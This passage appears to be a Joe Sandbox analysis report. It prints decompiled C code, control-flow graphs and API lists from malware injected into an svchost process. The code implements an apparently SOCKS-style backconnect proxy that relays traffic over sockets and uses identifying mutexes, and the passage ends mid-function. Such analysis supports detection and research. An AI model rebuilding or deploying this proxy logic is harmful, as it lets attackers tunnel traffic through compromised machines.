                    • Instruction ID: ab1b276f363fb928f2e47e978fdef31d8b50945bf9a96574778738bf99c8aea8
                    • Opcode Fuzzy Hash: d4c7e9dea616001f0791a9ad0e20f2fc90fd2169edebe345075cae1d4de062f5
                    • Instruction Fuzzy Hash: 2E614C7AD04214ABEB945BA59C49FBF7BA8EB02314F14016FF941E72B3D63C9D40869C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 183 4c347c-4c3491 WaitForSingleObject 184 4c361a-4c361e 183->184 185 4c3497-4c3498 183->185 186 4c3499-4c34a0 185->186 187 4c3618-4c3619 186->187 188 4c34a6-4c34be call 4c300c 186->188 187->184 191 4c34c4-4c34d6 call 4c2e56 188->191 192 4c3611 188->192 191->192 195 4c34dc-4c34e3 191->195 192->187 196 4c351c 195->196 197 4c34e5-4c34f8 call 4c300c 195->197 198 4c351e-4c3541 InterlockedExchange 196->198 202 4c34fd-4c3504 197->202 200 4c3565-4c356a 198->200 201 4c3543-4c355f ResetEvent WaitForSingleObject 198->201 203 4c356c-4c356e 200->203 204 4c359e-4c35a7 call 4c32f4 200->204 201->187 201->200 202->192 205 4c350a-4c351a call 4c2e56 202->205 206 4c357b-4c358c send 203->206 207 4c3570-4c3572 203->207 213 4c35ac 204->213 205->198 210 4c35af-4c35be InterlockedCompareExchange 206->210 212 4c358e-4c3592 206->212 207->210 211 4c3574-4c3579 207->211 215 4c35e9-4c3609 ResetEvent WaitForSingleObject 210->215 216 4c35c0-4c35c7 210->216 217 4c3594-4c359c call 4c2d80 211->217 212->217 213->210 215->186 220 4c360f 215->220 218 4c35c9-4c35cb Sleep 216->218 219 4c35d1-4c35d9 216->219 217->210 218->219 222 4c35db-4c35e4 SetEvent 219->222 223 4c35e6 219->223 220->187 222->215 223->215
                    C-Code - Quality: 81%
                    			E004C347C(void* __ecx, signed char _a4, signed char _a5, signed short _a6) {
                    				LONG* _v8;
                    				void* __edi;
                    				void* _t32;
                    				signed char _t35;
                    				LONG* _t36;
                    				long _t37;
                    				signed char _t38;
                    				signed int _t45;
                    				void* _t47;
                    				signed int _t48;
                    				void* _t53;
                    				void* _t57;
                    				void* _t71;
                    				LONG* _t72;
                    				long _t75;
                    				void* _t77;
                    
                    				_t75 = _a4;
                    				if(WaitForSingleObject( *(_t75 + 4), 0xffffffff) != 0) {
                    					L29:
                    					return 0;
                    				}
                    				while( *0x4c541f == 0) {
                    					_t32 = E004C300C( *0x4c5420,  &_a4, 4, 4); // executed
                    					_t77 = _t77 + 0x10;
                    					if(_t32 <= 0) {
                    						L27:
                    						 *0x4c541f = 1;
                    						break;
                    					}
                    					E004C2E56( &_a4, 4);
                    					_t35 = _a4;
                    					if(_t35 > 3) {
                    						goto L27;
                    					}
                    					_t61 = _a6;
                    					if(_a6 == 0) {
                    						_t57 = 0;
                    						L9:
                    						_t71 = 0x4c5440 + (_t35 & 0x000000ff) * 0xc;
                    						_t36 = _t71 + 8;
                    						 *0x4c541e = 0;
                    						_v8 = _t36;
                    						_t37 = InterlockedExchange(_t36, _t75);
                    						if(_t37 == 0) {
                    							L11:
                    							_t38 = _a4;
                    							if(_t38 <= 1) {
                    								E004C32F4(_t71,  &_a4, _t75 + 9, _t57); // executed
                    								_t77 = _t77 + 0xc;
                    								L19:
                    								_t72 = _v8;
                    								if(InterlockedCompareExchange(_t72, 0, _t75) != _t75) {
                    									if( *(_t75 + 0x10008) == 0) {
                    										Sleep(1);
                    									}
                    									_t45 =  *(_t75 + 0x10008);
                    									if(_t45 == 0) {
                    										 *_t72 =  *_t72 & 0x00000000;
                    									} else {
                    										SetEvent( *(_t45 + 4));
                    									}
                    								}
                    								ResetEvent( *(_t75 + 4));
                    								 *(_t75 + 0x10008) =  *(_t75 + 0x10008) & 0x00000000;
                    								 *_t75 = 0;
                    								if(WaitForSingleObject( *(_t75 + 4), 0xffffffff) == 0) {
                    									continue;
                    								} else {
                    									break;
                    								}
                    							}
                    							if(_t38 == 2) {
                    								_push(0);
                    								_push(_t57);
                    								_t47 = _t75 + 9;
                    								_push(_t47);
                    								_push( *((intOrPtr*)(_t71 + 4)));
                    								L004C3770(); // executed
                    								if(_t47 > 0) {
                    									goto L19;
                    								}
                    								_t48 = _a5 & 0x000000ff;
                    								_push(1);
                    								L17:
                    								_push(_t48);
                    								E004C2D80();
                    								goto L19;
                    							}
                    							if(_t38 != 3) {
                    								goto L19;
                    							}
                    							_push(0);
                    							_t48 = _t38 & 0x000000ff;
                    							goto L17;
                    						}
                    						 *(_t37 + 0x10008) = _t75;
                    						ResetEvent( *(_t75 + 4));
                    						if(WaitForSingleObject( *(_t75 + 4), 0xffffffff) != 0) {
                    							break;
                    						}
                    						goto L11;
                    					}
                    					_t73 = _t75 + 9;
                    					_t53 = E004C300C( *0x4c5420, _t75 + 9, 0xffff, _t61 & 0x0000ffff); // executed
                    					_t57 = _t53;
                    					_t77 = _t77 + 0x10;
                    					if(_t57 <= 0) {
                    						goto L27;
                    					}
                    					E004C2E56(_t73, _a6 & 0x0000ffff);
                    					_t35 = _a4;
                    					goto L9;
                    				}
                    				goto L29;
                    			}



















                    0x004c3481
                    0x004c3491
                    0x004c361a
                    0x004c361e
                    0x004c361e
                    0x004c3499
                    0x004c34b4
                    0x004c34b9
                    0x004c34be
                    0x004c3611
                    0x004c3611
                    0x00000000
                    0x004c3611
                    0x004c34ca
                    0x004c34cf
                    0x004c34d6
                    0x00000000
                    0x00000000
                    0x004c34dc
                    0x004c34e3
                    0x004c351c
                    0x004c351e
                    0x004c3524
                    0x004c352b
                    0x004c352f
                    0x004c3536
                    0x004c3539
                    0x004c3541
                    0x004c3565
                    0x004c3565
                    0x004c356a
                    0x004c35a7
                    0x004c35ac
                    0x004c35af
                    0x004c35af
                    0x004c35be
                    0x004c35c7
                    0x004c35cb
                    0x004c35cb
                    0x004c35d1
                    0x004c35d9
                    0x004c35e6
                    0x004c35db
                    0x004c35de
                    0x004c35de
                    0x004c35d9
                    0x004c35ec
                    0x004c35f2
                    0x004c35fb
                    0x004c3609
                    0x00000000
                    0x004c360f
                    0x00000000
                    0x004c360f
                    0x004c3609
                    0x004c356e
                    0x004c357b
                    0x004c357d
                    0x004c357e
                    0x004c3581
                    0x004c3582
                    0x004c3585
                    0x004c358c
                    0x00000000
                    0x00000000
                    0x004c358e
                    0x004c3592
                    0x004c3594
                    0x004c3594
                    0x004c3595
                    0x00000000
                    0x004c359b
                    0x004c3572
                    0x00000000
                    0x00000000
                    0x004c3574
                    0x004c3576
                    0x00000000
                    0x004c3576
                    0x004c3543
                    0x004c354c
                    0x004c355f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004c355f
                    0x004c34ee
                    0x004c34f8
                    0x004c34fd
                    0x004c34ff
                    0x004c3504
                    0x00000000
                    0x00000000
                    0x004c3510
                    0x004c3515
                    0x00000000
                    0x004c3519
                    0x00000000

                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004C3489
                      • Part of subcall function 004C300C: recv.WS2_32(?,?,?,00000000), ref: 004C3033
                    • InterlockedExchange.KERNEL32(?,?), ref: 004C3539
                    • ResetEvent.KERNEL32(?), ref: 004C354C
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004C3557
                    • send.WS2_32(?,?,00000000,00000000), ref: 004C3585
                    • InterlockedCompareExchange.KERNEL32(?,00000000,?), ref: 004C35B6
                    • Sleep.KERNEL32(00000001), ref: 004C35CB
                    • SetEvent.KERNEL32(?), ref: 004C35DE
                    • ResetEvent.KERNEL32(?), ref: 004C35EC
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004C3601
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: EventObjectSingleWait$ExchangeInterlockedReset$CompareSleeprecvsend
                    • String ID:
                    • API String ID: 2364824998-0
                    • Opcode ID: f1923ac54821e50552b9008bdba0398151ca25680ca03c0c2e8d72ac508c9595
                    • Instruction ID: 30984534dc4954d921f66539af649afb514c3d568764faec1d028f0318b9d93e
                    • Opcode Fuzzy Hash: f1923ac54821e50552b9008bdba0398151ca25680ca03c0c2e8d72ac508c9595
                    • Instruction Fuzzy Hash: 2E41F97A204204BFD7A05F21DD05FAB77A8AF04756F10843FF6598A290E779EB81875C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 225 4c1000-4c1011 gethostbyname 226 4c1017-4c1026 inet_ntoa 225->226 227 4c1013-4c1016 225->227 226->227 228 4c1028-4c104a lstrcpyA socket 226->228 229 4c104c-4c1082 htons inet_addr connect 228->229 230 4c1091-4c1094 228->230 231 4c108f 229->231 232 4c1084-4c108d closesocket 229->232 231->230 232->230
                    APIs
                    • gethostbyname.WS2_32(?), ref: 004C1009
                    • inet_ntoa.WS2_32(?), ref: 004C101E
                    • lstrcpyA.KERNEL32(?,00000000), ref: 004C102F
                    • socket.WS2_32(00000002,00000001,00000000), ref: 004C103D
                    • htons.WS2_32(?), ref: 004C105B
                    • inet_addr.WS2_32(?), ref: 004C1069
                    • connect.WS2_32(00000000,?,00000010), ref: 004C1079
                    • closesocket.WS2_32(00000000), ref: 004C1085
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: closesocketconnectgethostbynamehtonsinet_addrinet_ntoalstrcpysocket
                    • String ID:
                    • API String ID: 3261360984-0
                    • Opcode ID: dc7795ef9660ac567854bd7d0566522e5e721f07be27e3e579c87df830a6be26
                    • Instruction ID: 4e0a00d184e56e58054556c99c91fe05371f51fbec4879c04c3d610cfca2f074
                    • Opcode Fuzzy Hash: dc7795ef9660ac567854bd7d0566522e5e721f07be27e3e579c87df830a6be26
                    • Instruction Fuzzy Hash: 5A11CE35600218BFDB509BB5DD0DEAAB7B8EF49351F044535FA41E61B1EB34C9808B69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E004C2F35(void* _a4, void* _a8) {
                    				void* _t12;
                    				void* _t15;
                    				char _t17;
                    				void* _t19;
                    				void* _t20;
                    				struct _SECURITY_ATTRIBUTES* _t24;
                    				void* _t25;
                    
                    				E004C1D75(0x4c5440, 0, 0xc00);
                    				_t20 = _a4;
                    				E004C1D75(_t20, 0, 0x80060);
                    				E004C1D75(_a8, 0, 0x80060);
                    				_t19 = 8;
                    				_t24 = 0;
                    				do {
                    					 *((intOrPtr*)(_t20 + 4)) = CreateEventA(0, 1, 0, 0);
                    					_t12 = CreateThread(0, 0, E004C347C, _t20, 0, 0); // executed
                    					CloseHandle(_t12);
                    					_t20 = _t20 + 0x1000c;
                    					_t24 = _t24 - 1;
                    				} while (_t24 != 0);
                    				_t25 = _a8;
                    				do {
                    					 *((intOrPtr*)(_t25 + 4)) = CreateEventA(0, 1, 0, 0);
                    					_t15 = CreateThread(0, 0, E004C3621, _t25, 0, 0); // executed
                    					CloseHandle(_t15);
                    					_t25 = _t25 + 0x1000c;
                    					_t19 = _t19 - 1;
                    				} while (_t19 != 0);
                    				InitializeCriticalSection(0x4c5424);
                    				_t17 =  *0x4c6040;
                    				 *0x4c540c = 0;
                    				 *0x4c5410 = 0;
                    				 *0x4c5414 = 0;
                    				 *0x4c5418 = 0;
                    				 *0x4c541d = _t17;
                    				 *0x4c541c = _t17;
                    				return _t17;
                    			}










                    0x004c2f48
                    0x004c2f4d
                    0x004c2f58
                    0x004c2f63
                    0x004c2f6d
                    0x004c2f6e
                    0x004c2f70
                    0x004c2f7d
                    0x004c2f8c
                    0x004c2f93
                    0x004c2f99
                    0x004c2f9f
                    0x004c2f9f
                    0x004c2fa2
                    0x004c2fa7
                    0x004c2fbc
                    0x004c2fbf
                    0x004c2fc6
                    0x004c2fcc
                    0x004c2fd2
                    0x004c2fd2
                    0x004c2fda
                    0x004c2fe0
                    0x004c2fe5
                    0x004c2feb
                    0x004c2ff1
                    0x004c2ff7
                    0x004c2fff
                    0x004c3004
                    0x004c300b

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,004C3087,00000000,00000000,00080060,00080060), ref: 004C2F77
                    • CreateThread.KERNELBASE(00000000,00000000,Function_0000347C,?,00000000,00000000), ref: 004C2F8C
                    • CloseHandle.KERNEL32(00000000,?,004C3087,00000000,00000000,00080060,00080060), ref: 004C2F93
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,004C3087,00000000,00000000,00080060,00080060), ref: 004C2FAC
                    • CreateThread.KERNELBASE(00000000,00000000,Function_00003621,?,00000000,00000000), ref: 004C2FBF
                    • CloseHandle.KERNEL32(00000000,?,004C3087,00000000,00000000,00080060,00080060), ref: 004C2FC6
                    • InitializeCriticalSection.KERNEL32(004C5424,?,004C3087,00000000,00000000,00080060,00080060), ref: 004C2FDA
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: Create$CloseEventHandleThread$CriticalInitializeSection
                    • String ID:
                    • API String ID: 1049990500-0
                    • Opcode ID: fc2b0207aa07c43c41936d47136517024fba1e87b281be6a6bbe9b7de52da79a
                    • Instruction ID: 4ba1c98160b3282d649e8c438add14f84cbfea39056ee65ac56885ca62ff6197
                    • Opcode Fuzzy Hash: fc2b0207aa07c43c41936d47136517024fba1e87b281be6a6bbe9b7de52da79a
                    • Instruction Fuzzy Hash: 8821A1B5550614BFD7906BA26C49F6B7F7CEBC6755B01803EF90893211C2B86880C7BC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 244 4c2512-4c2525 245 4c2527-4c2529 244->245 246 4c2532-4c2561 call 4c3720 wsprintfA CreateMutexA 244->246 245->246 247 4c252b-4c2530 245->247 249 4c2566-4c2567 246->249 247->249 251 4c256f-4c2585 GetLastError 249->251 252 4c2569-4c256a 249->252 255 4c2588-4c258e CloseHandle 251->255 253 4c256c-4c256d 252->253 254 4c2594-4c259a 252->254 253->255 255->254
                    C-Code - Quality: 65%
                    			E004C2512(intOrPtr _a4) {
                    				char _v36;
                    				char _v100;
                    				void* _t10;
                    				signed char _t15;
                    				intOrPtr _t21;
                    				void* _t22;
                    
                    				_t21 = _a4;
                    				_t15 = 1;
                    				if(_t21 == 0 || _t21 == 1) {
                    					_push("730c0a4976f1cf34");
                    					wsprintfA( &_v100, E004C3720("Global\\%sstp",  &_v36));
                    					_t10 = CreateMutexA(0, 0,  &_v100); // executed
                    					 *0x4c5268 = _t10;
                    				} else {
                    					_t10 =  *0x4c5268; // 0x0
                    				}
                    				_t22 = _t21 - 1;
                    				if(_t22 == 0) {
                    					GetLastError();
                    					_push( *0x4c5268);
                    					_t15 =  !=  ? 0 : _t15 & 0x000000ff;
                    					goto L8;
                    				} else {
                    					if(_t22 == 1) {
                    						_push(_t10);
                    						L8:
                    						CloseHandle();
                    						 *0x4c5268 = 0;
                    					}
                    				}
                    				return _t15;
                    			}









                    0x004c251a
                    0x004c2522
                    0x004c2525
                    0x004c2532
                    0x004c254c
                    0x004c255b
                    0x004c2561
                    0x004c252b
                    0x004c252b
                    0x004c252b
                    0x004c2566
                    0x004c2567
                    0x004c256f
                    0x004c2575
                    0x004c2585
                    0x00000000
                    0x004c2569
                    0x004c256a
                    0x004c256c
                    0x004c2588
                    0x004c2588
                    0x004c258e
                    0x004c258e
                    0x004c256a
                    0x004c259a

                    APIs
                    • wsprintfA.USER32 ref: 004C254C
                    • CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 004C255B
                    • GetLastError.KERNEL32 ref: 004C256F
                    • CloseHandle.KERNEL32(00000000), ref: 004C2588
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateErrorHandleLastMutexwsprintf
                    • String ID: 730c0a4976f1cf34$Global\%sstp
                    • API String ID: 267433607-1306516754
                    • Opcode ID: e6310d93c70ab2fec23267c2f012c3f5bdfdecb836fa1b43ce682cd4f207c012
                    • Instruction ID: c054c443ab472be9966933db527f151812823af5db68df9c326154bc95d09fd5
                    • Opcode Fuzzy Hash: e6310d93c70ab2fec23267c2f012c3f5bdfdecb836fa1b43ce682cd4f207c012
                    • Instruction Fuzzy Hash: 6F01287A944214BF97909B95AD99E7F33FCF684350304003BE901D3110DAF85D858A7C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 256 4c1f27-4c1f65 call 4c3720 wsprintfA CreateMutexA 259 4c1f67-4c1f72 GetLastError 256->259 260 4c1f90-4c1f94 256->260 261 4c1f89 259->261 262 4c1f74-4c1f87 CloseHandle 259->262 263 4c1f8e 261->263 262->263 263->260
                    C-Code - Quality: 89%
                    			E004C1F27() {
                    				char _v36;
                    				char _v100;
                    				signed int _t11;
                    				signed int _t21;
                    
                    				_push("730c0a4976f1cf34");
                    				wsprintfA( &_v100, E004C3720("Global\\%snps",  &_v36));
                    				_t11 = CreateMutexA(0, 0,  &_v100); // executed
                    				 *0x4c5264 = _t11;
                    				if(_t11 != 0) {
                    					if(GetLastError() != 0xb7) {
                    						_t11 =  *0x4c5264; // 0x1e8
                    					} else {
                    						CloseHandle( *0x4c5264);
                    						_t11 = 0;
                    						 *0x4c5264 = 0;
                    					}
                    					_t21 = _t11;
                    				}
                    				return _t11 & 0xffffff00 | _t21 != 0x00000000;
                    			}







                    0x004c1f30
                    0x004c1f47
                    0x004c1f58
                    0x004c1f5e
                    0x004c1f65
                    0x004c1f72
                    0x004c1f89
                    0x004c1f74
                    0x004c1f7a
                    0x004c1f80
                    0x004c1f82
                    0x004c1f82
                    0x004c1f8e
                    0x004c1f8e
                    0x004c1f94

                    APIs
                      • Part of subcall function 004C3720: lstrcpyA.KERNEL32(?,?,?,004C212C,C:\,?,?,00000200,?,00000000,?,?,00000040), ref: 004C3729
                    • wsprintfA.USER32 ref: 004C1F47
                    • CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 004C1F58
                    • GetLastError.KERNEL32 ref: 004C1F67
                    • CloseHandle.KERNEL32 ref: 004C1F7A
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateErrorHandleLastMutexlstrcpywsprintf
                    • String ID: 730c0a4976f1cf34$Global\%snps
                    • API String ID: 1928693151-2755950991
                    • Opcode ID: c0f557e3cd828ffa0a06d43a3b1f8c58c753215b636258a7385793d9a84071d8
                    • Instruction ID: 974af5e407d6502a0a50905d3a1e308ad74983380e3ed5a930d33cbc6aa2789b
                    • Opcode Fuzzy Hash: c0f557e3cd828ffa0a06d43a3b1f8c58c753215b636258a7385793d9a84071d8
                    • Instruction Fuzzy Hash: 8DF09679648305DFD7809BA1ED4AF6D37ECE744340F04003EF505DA1A1EB74E8408AAD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 264 4c32f4-4c3305 265 4c341f 264->265 266 4c330b-4c3311 264->266 267 4c3423-4c3433 call 4c36af 265->267 268 4c3323-4c3327 266->268 269 4c3313-4c331e 266->269 272 4c3438-4c343e 267->272 268->267 271 4c332d-4c333a 268->271 269->267 273 4c333c-4c334f htons 271->273 274 4c3351-4c3353 271->274 275 4c33a7-4c33ab 273->275 276 4c33a4 274->276 277 4c3355-4c3395 call 4c1d51 htons gethostbyname 274->277 275->267 279 4c33ad-4c33c3 inet_ntoa call 4c2db7 275->279 276->275 282 4c3397-4c339e 277->282 283 4c33a0 277->283 285 4c3419-4c341d 279->285 286 4c33c5-4c33e7 getsockname 279->286 282->275 283->276 285->267 287 4c340d-4c3417 closesocket 286->287 288 4c33e9-4c340b 286->288 287->267 288->267
                    C-Code - Quality: 56%
                    			E004C32F4(void* __edi, signed char _a4, signed int _a8, intOrPtr _a12) {
                    				signed char _v16;
                    				signed short _v18;
                    				char _v20;
                    				char _v276;
                    				void* _t46;
                    				intOrPtr _t50;
                    				char* _t53;
                    				signed short _t62;
                    				signed short _t64;
                    				char* _t65;
                    				void* _t71;
                    				signed char _t74;
                    				intOrPtr _t75;
                    				signed int _t76;
                    				void* _t78;
                    				void* _t79;
                    
                    				_t71 = __edi;
                    				_t65 = _a8;
                    				if( *_t65 != 5) {
                    					 *((char*)(_t65 + 1)) = 7;
                    					L18:
                    					_t46 = E004C36AF( *_a4 & 0x000000ff,  *(_a4 + 1) & 0x000000ff, _t65, _a12); // executed
                    					return _t46;
                    				}
                    				if( *_a4 != 0) {
                    					if( *((char*)(_t65 + 1)) != 1) {
                    						goto L18;
                    					}
                    					_a8 = 0;
                    					 *((char*)(_t65 + 1)) = 0;
                    					_t49 =  *((intOrPtr*)(_t65 + 3));
                    					if(_t49 != 1) {
                    						if(_t49 != 3) {
                    							L10:
                    							_t74 = _a4;
                    							goto L11;
                    						}
                    						_t76 =  *(_t65 + 4) & 0x000000ff;
                    						E004C1D51( &_v276, _t65 + 5, _t76);
                    						 *((char*)(_t78 + _t76 - 0x110)) = 0;
                    						_t62 =  *(_t76 + _t65 + 5) & 0x0000ffff;
                    						_t79 = _t79 + 0xc;
                    						_push(_t62);
                    						L004C3752();
                    						_a8 = _t62 & 0x0000ffff;
                    						_t49 =  &_v276;
                    						_push(_t49); // executed
                    						L004C377C(); // executed
                    						if(_t49 == 0) {
                    							 *((char*)(_t65 + 1)) = 4;
                    							goto L10;
                    						}
                    						_t74 =  *( *_t49);
                    						goto L11;
                    					} else {
                    						_t64 =  *(_t65 + 8) & 0x0000ffff;
                    						_t74 =  *(_t65 + 4);
                    						_push(_t64);
                    						L004C3794();
                    						_t49 = _t64 & 0x0000ffff;
                    						_a8 = _t64 & 0x0000ffff;
                    						L11:
                    						if( *((char*)(_t65 + 1)) == 0) {
                    							_push(_t74);
                    							L004C375E();
                    							_t50 = E004C2DB7(_t49, _t49, _a8); // executed
                    							_t75 = _t50;
                    							if(_t75 == 0) {
                    								 *((char*)(_t65 + 1)) = 4;
                    							} else {
                    								_push(_t71);
                    								asm("stosd");
                    								asm("stosd");
                    								asm("stosd");
                    								asm("stosd");
                    								_push( &_a8);
                    								_t53 =  &_v20;
                    								_push(_t53);
                    								_push(_t75);
                    								_a8 = 0x10;
                    								L004C378E(); // executed
                    								if(_t53 != 0) {
                    									_push(_t75);
                    									 *((char*)(_t65 + 1)) = 4;
                    									L004C3746();
                    								} else {
                    									 *(_t65 + 4) = _v16;
                    									 *(_t65 + 8) = _v18;
                    									 *((char*)(_t65 + 3)) = 1;
                    									 *((intOrPtr*)(0x4c5444 + ( *(_a4 + 1) & 0x000000ff) * 0xc)) = _t75;
                    								}
                    							}
                    						}
                    						goto L18;
                    					}
                    				} else {
                    					 *((char*)(_t65 + 1)) = 0;
                    					_a12 = 2;
                    					goto L18;
                    				}
                    			}



















                    0x004c32f4
                    0x004c32fe
                    0x004c3305
                    0x004c341f
                    0x004c3423
                    0x004c3433
                    0x004c343e
                    0x004c343e
                    0x004c3311
                    0x004c3327
                    0x00000000
                    0x00000000
                    0x004c332f
                    0x004c3332
                    0x004c3335
                    0x004c333a
                    0x004c3353
                    0x004c33a4
                    0x004c33a4
                    0x00000000
                    0x004c33a4
                    0x004c3355
                    0x004c3365
                    0x004c336c
                    0x004c3373
                    0x004c3378
                    0x004c337b
                    0x004c337c
                    0x004c3384
                    0x004c3387
                    0x004c338d
                    0x004c338e
                    0x004c3395
                    0x004c33a0
                    0x00000000
                    0x004c33a0
                    0x004c339c
                    0x00000000
                    0x004c333c
                    0x004c333c
                    0x004c3340
                    0x004c3343
                    0x004c3344
                    0x004c3349
                    0x004c334c
                    0x004c33a7
                    0x004c33ab
                    0x004c33ad
                    0x004c33ae
                    0x004c33b8
                    0x004c33bd
                    0x004c33c3
                    0x004c3419
                    0x004c33c5
                    0x004c33c5
                    0x004c33cb
                    0x004c33cc
                    0x004c33cd
                    0x004c33ce
                    0x004c33d2
                    0x004c33d3
                    0x004c33d6
                    0x004c33d7
                    0x004c33d8
                    0x004c33df
                    0x004c33e7
                    0x004c340d
                    0x004c340e
                    0x004c3412
                    0x004c33e9
                    0x004c33ec
                    0x004c33f3
                    0x004c33fa
                    0x004c3405
                    0x004c3405
                    0x004c33e7
                    0x004c33c3
                    0x00000000
                    0x004c33ab
                    0x004c3313
                    0x004c3313
                    0x004c3317
                    0x00000000
                    0x004c3317

                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: getsocknamehtonsinet_ntoa
                    • String ID:
                    • API String ID: 4224382231-0
                    • Opcode ID: 250e849901c803cd94f170a7b7fe56268f73717f8cb27a966eb9b0756f7a421b
                    • Instruction ID: 88c0ec7b92c7d0c41f0ef7b5639144b487215d87985bc7416c88f60afe7d2bf0
                    • Opcode Fuzzy Hash: 250e849901c803cd94f170a7b7fe56268f73717f8cb27a966eb9b0756f7a421b
                    • Instruction Fuzzy Hash: FE41E8B9804294AEDF45CF65C440FA6BBA89F09315F08C09FED49DF247D279DA408B79
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 289 4c2db7-4c2dd3 socket 290 4c2e15-4c2e18 289->290 291 4c2dd5-4c2e07 htons inet_addr connect 289->291 292 4c2e09-4c2e11 closesocket 291->292 293 4c2e13 291->293 292->290 293->290
                    C-Code - Quality: 41%
                    			E004C2DB7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                    				short _v16;
                    				short _v18;
                    				char _v20;
                    				char* _t10;
                    				short _t13;
                    
                    				_push(0);
                    				_push(1);
                    				_t13 = 2;
                    				_push(_t13); // executed
                    				L004C3776(); // executed
                    				if(__eax != 0xffffffff) {
                    					_push(_a8);
                    					asm("stosd");
                    					asm("stosd");
                    					asm("stosd");
                    					asm("stosd");
                    					_v20 = _t13;
                    					L004C3752();
                    					_v18 = 0;
                    					_push(_a4);
                    					L004C3758();
                    					_v16 = 0;
                    					_push(0x10);
                    					_t10 =  &_v20;
                    					_push(_t10);
                    					_push(__eax); // executed
                    					L004C374C(); // executed
                    					if(_t10 == 0) {
                    						return __eax;
                    					}
                    					_push(__eax);
                    					L004C3746();
                    					return 0;
                    				}
                    				return 0;
                    			}








                    0x004c2dbf
                    0x004c2dc1
                    0x004c2dc5
                    0x004c2dc6
                    0x004c2dc7
                    0x004c2dd3
                    0x004c2dd6
                    0x004c2ddc
                    0x004c2ddd
                    0x004c2dde
                    0x004c2ddf
                    0x004c2de0
                    0x004c2de4
                    0x004c2de9
                    0x004c2ded
                    0x004c2df0
                    0x004c2df5
                    0x004c2df8
                    0x004c2dfa
                    0x004c2dfd
                    0x004c2dfe
                    0x004c2dff
                    0x004c2e07
                    0x00000000
                    0x004c2e13
                    0x004c2e09
                    0x004c2e0a
                    0x00000000
                    0x004c2e0f
                    0x004c2e18

                    APIs
                    • socket.WS2_32(00000002,00000001,00000000), ref: 004C2DC7
                    • htons.WS2_32(?), ref: 004C2DE4
                    • inet_addr.WS2_32(?), ref: 004C2DF0
                    • connect.WS2_32(00000000,00000000,00000010), ref: 004C2DFF
                    • closesocket.WS2_32(00000000), ref: 004C2E0A
                    Memory Dump Source
                    • Source File: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_4c0000_svchost.jbxd
                    Yara matches
                    Similarity
                    • API ID: closesocketconnecthtonsinet_addrsocket
                    • String ID:
                    • API String ID: 4100322073-0
                    • Opcode ID: dd4b1a74bb4503a20782a8a6ccdb1e85e78c075e2a39a4eb070d883f36f3f593
                    • Instruction ID: 8c4fa767125abccfc21f6a6eab01b7912bb771f2ccc417aa57a2c2f918fec172
                    • Opcode Fuzzy Hash: dd4b1a74bb4503a20782a8a6ccdb1e85e78c075e2a39a4eb070d883f36f3f593
                    • Instruction Fuzzy Hash: 5DF0FCB960111939EB507AB9CC42FAF736C9F04754F00C53EF510B61D2E3B49E014759
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 47%
                    			E004C36AF(char _a4, char _a5, short _a6, char _a8, intOrPtr _a12, short _a16) {
                    				short _t23;
                    
                    				_t23 = _a16;
                    				_a5 = _a8;
                    				_a6 = _t23;
                    				EnterCriticalSection(0x4c5424);
                    				E004C2EC1( &_a4, 4);
                    				_push(0);
                    				_push(4);
                    				_push( &_a4);
                    				_push( *0x4c5420); // executed
                    				L004C3770(); // executed
                    				if(_t23 > 0) {
